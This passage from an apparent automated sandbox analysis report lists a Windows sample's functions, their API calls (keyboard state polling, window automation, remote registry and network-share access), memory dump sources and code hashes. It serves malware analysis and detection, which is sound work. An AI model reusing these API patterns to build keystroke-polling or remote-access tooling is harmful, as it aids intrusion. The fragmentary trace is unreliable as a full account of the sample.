                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 986aa4499765845cfc9c7f6991d7c5a311b5db40bd57d91b41fd297c6cfd97a1
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D318F71A41128BBDB359BA0DC88EFFBB7DEF45790F108065B809E2140DB389E459BE4
                                                                                                                                                                                                                                                                              Function 0075EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • timeGetTime.WINMM ref: 0075EFCB
                                                                                                                                                                                                                                                                                • Part of subcall function 0070F215: timeGetTime.WINMM(?,?,0075EFEB), ref: 0070F219
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 0075EFF8
                                                                                                                                                                                                                                                                              • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0075F01C
                                                                                                                                                                                                                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0075F03E
                                                                                                                                                                                                                                                                              • SetActiveWindow.USER32 ref: 0075F05D
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0075F06B
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0075F08A
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000000FA), ref: 0075F095
                                                                                                                                                                                                                                                                              • IsWindow.USER32 ref: 0075F0A1
                                                                                                                                                                                                                                                                              • EndDialog.USER32(00000000), ref: 0075F0B2
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                              • String ID: BUTTON
                                                                                                                                                                                                                                                                              • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                              • Opcode ID: aea91adf34b77c025bf5916385871513c47844dfbcd615068b51ec4da4e73e8d
                                                                                                                                                                                                                                                                              • Instruction ID: a3783f4f9205bc940cefb51f5474fe70d838d8c03ed7fc67a57a092bb686c017
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aea91adf34b77c025bf5916385871513c47844dfbcd615068b51ec4da4e73e8d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A218071640204BFE7216F20EC89FAA7BA9FB44756B14C029F945922F2CBBD4D498719
                                                                                                                                                                                                                                                                              Function 0075F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0075F374
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0075F38A
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0075F39B
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0075F3AD
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0075F3BE
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                              • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                              • Opcode ID: 8908617968a03d609d91c959b4c9858912591b35ce93364803a8bcbafbaca143
                                                                                                                                                                                                                                                                              • Instruction ID: cc3aa77e778280ae8beaec86fd5a49a794fea46b36414d509ce5f9c4659d6fcd
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8908617968a03d609d91c959b4c9858912591b35ce93364803a8bcbafbaca143
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9411A0B1A9025D79E724A7A5CC4AFFF7A7CEFD2B40F000429B901E20D0EAA46D08C5A5
                                                                                                                                                                                                                                                                              Function 00722FF3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00723007
                                                                                                                                                                                                                                                                                • Part of subcall function 00722D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0072DB51,007C1DC4,00000000,007C1DC4,00000000,?,0072DB78,007C1DC4,00000007,007C1DC4,?,0072DF75,007C1DC4), ref: 00722D4E
                                                                                                                                                                                                                                                                                • Part of subcall function 00722D38: GetLastError.KERNEL32(007C1DC4,?,0072DB51,007C1DC4,00000000,007C1DC4,00000000,?,0072DB78,007C1DC4,00000007,007C1DC4,?,0072DF75,007C1DC4,007C1DC4), ref: 00722D60
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00723013
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0072301E
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00723029
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00723034
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0072303F
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0072304A
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00723055
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00723060
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0072306E
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                              • String ID: &y
                                                                                                                                                                                                                                                                              • API String ID: 776569668-238476832
                                                                                                                                                                                                                                                                              • Opcode ID: 158736c540f197d36d9f95ebd53f6c5b67b3b8bda582218d78d894a96272f3b6
                                                                                                                                                                                                                                                                              • Instruction ID: 6964a88d5f40d040e68ca026f98c450b3c949d6b1247c7fb1619071ae6be9df6
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 158736c540f197d36d9f95ebd53f6c5b67b3b8bda582218d78d894a96272f3b6
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D11A276644118FFCB01EF94E846CDD3BA5EF09350BC145A5FA089B223DA36EA529F90
                                                                                                                                                                                                                                                                              Function 0075A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 0075A9D9
                                                                                                                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 0075AA44
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 0075AA64
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(000000A0), ref: 0075AA7B
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 0075AAAA
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(000000A1), ref: 0075AABB
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 0075AAE7
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 0075AAF5
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 0075AB1E
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 0075AB2C
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 0075AB55
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(0000005B), ref: 0075AB63
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 541375521-0
                                                                                                                                                                                                                                                                              • Opcode ID: 3e2029c50846280689ee253d2c21f81182402aa514677300eefef0f0fa26b206
                                                                                                                                                                                                                                                                              • Instruction ID: f3721b0834215a06708b3c7b4eb56f98b7b78ee2188f7400124a10c5c9a1624e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e2029c50846280689ee253d2c21f81182402aa514677300eefef0f0fa26b206
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC51D760A0479579FB35D7608854BEAAFB55F11341F0886A9CDC2161C2DBE8AB4CC7A3
                                                                                                                                                                                                                                                                              Function 0075662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00756649
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00756662
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 007566C0
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 007566D0
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 007566E2
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00756736
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00756744
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00756756
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00756798
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 007567AB
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007567C1
                                                                                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 007567CE
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                              • Opcode ID: 103bda487936e733efd0d8a4255f2053f90b40ad98f786f1121cd39defadcca2
                                                                                                                                                                                                                                                                              • Instruction ID: 5978f7104686475feea837b45926d9e2a796346e23bd1f3c116b50630d0f4dcf
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 103bda487936e733efd0d8a4255f2053f90b40ad98f786f1121cd39defadcca2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7512FB1B40209AFDF18CF68CD85AAEBBB5FB48315F608129F919E7290E7749D04CB50
                                                                                                                                                                                                                                                                              Function 006F2128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F2234: GetWindowLongW.USER32(?,000000EB), ref: 006F2242
                                                                                                                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 006F2152
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 259745315-0
                                                                                                                                                                                                                                                                              • Opcode ID: a7129b255ae8873a718ddd2ffb2c1672474f6514a6547e7111113e3fac2c8bcf
                                                                                                                                                                                                                                                                              • Instruction ID: f9291a63d1a3e8a8415f5e008dc3f2661a62c420e6a95d480c7de16247589691
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7129b255ae8873a718ddd2ffb2c1672474f6514a6547e7111113e3fac2c8bcf
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E41C531140649AFEB309F389C58BB93767AB42734F254215FBA2872E1C7399D42DF14
                                                                                                                                                                                                                                                                              Function 006F13A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 007328D1
                                                                                                                                                                                                                                                                              • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 007328EA
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007328FA
                                                                                                                                                                                                                                                                              • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00732912
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00732933
                                                                                                                                                                                                                                                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006F11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00732942
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0073295F
                                                                                                                                                                                                                                                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006F11F5,00000000,00000000,00000000,000000FF,00000000), ref: 0073296E
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                              • String ID: (|
                                                                                                                                                                                                                                                                              • API String ID: 1268354404-3772712737
                                                                                                                                                                                                                                                                              • Opcode ID: 39e9190eb13872095b614f13dbce08a0b29c7be8951e62e45678d3c6ea920379
                                                                                                                                                                                                                                                                              • Instruction ID: 182be8eaadaf5d41aee70376ad428715fdf53dbf67a2642d80badcccb525b059
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39e9190eb13872095b614f13dbce08a0b29c7be8951e62e45678d3c6ea920379
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E515B30600209EFEB24DF25CC45BAA77F6EB48760F208518FA46AA2E1D774ED52DB54
                                                                                                                                                                                                                                                                              Function 0078955E Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
                                                                                                                                                                                                                                                                                • Part of subcall function 006F19CD: GetCursorPos.USER32(?), ref: 006F19E1
                                                                                                                                                                                                                                                                                • Part of subcall function 006F19CD: ScreenToClient.USER32(00000000,?), ref: 006F19FE
                                                                                                                                                                                                                                                                                • Part of subcall function 006F19CD: GetAsyncKeyState.USER32(00000001), ref: 006F1A23
                                                                                                                                                                                                                                                                                • Part of subcall function 006F19CD: GetAsyncKeyState.USER32(00000002), ref: 006F1A3D
                                                                                                                                                                                                                                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 007895C7
                                                                                                                                                                                                                                                                              • ImageList_EndDrag.COMCTL32 ref: 007895CD
                                                                                                                                                                                                                                                                              • ReleaseCapture.USER32 ref: 007895D3
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 0078966E
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00789681
                                                                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0078975B
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID$(|$(|
                                                                                                                                                                                                                                                                              • API String ID: 1924731296-2735991863
                                                                                                                                                                                                                                                                              • Opcode ID: 8fd00fc285e00e6d9d6070a6abb725caffbe57c2b5e5018c63c8d22597af6b29
                                                                                                                                                                                                                                                                              • Instruction ID: 91285e6ff8f2b8aecb47a0c2c81c0ae5875a1e8c5f5bbabb6e8827c4d4fa9932
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fd00fc285e00e6d9d6070a6abb725caffbe57c2b5e5018c63c8d22597af6b29
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B51BC70240304AFD704EF10CC5AFBA77E5FB84710F500A2CFA95962E2DB78A904CB56
                                                                                                                                                                                                                                                                              Function 0075A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00740D31,00000001,0000138C,00000001,00000000,00000001,?,0076EEAE,007C2430), ref: 0075A091
                                                                                                                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00740D31,00000001), ref: 0075A09A
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00740D31,00000001,0000138C,00000001,00000000,00000001,?,0076EEAE,007C2430,?), ref: 0075A0BC
                                                                                                                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00740D31,00000001), ref: 0075A0BF
                                                                                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0075A1E0
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                              • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                              • Opcode ID: 73fe0423d6b252118154b66c78f5485c126a210b2c7ed6deb6b61c9006705e96
                                                                                                                                                                                                                                                                              • Instruction ID: 08ea56ccb0a7a15e3cbbdefb55e0a18493c5f33d925094781394c1efb11e3f9a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73fe0423d6b252118154b66c78f5485c126a210b2c7ed6deb6b61c9006705e96
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F41407280010DAACB14FBE0DD56EFEB779AF14341F504169F601B2092EB796F49CBA5
                                                                                                                                                                                                                                                                              Function 00750FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F8577: _wcslen.LIBCMT ref: 006F858A
                                                                                                                                                                                                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00751093
                                                                                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007510AF
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007510CB
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007510F5
                                                                                                                                                                                                                                                                              • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0075111D
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00751128
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0075112D
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
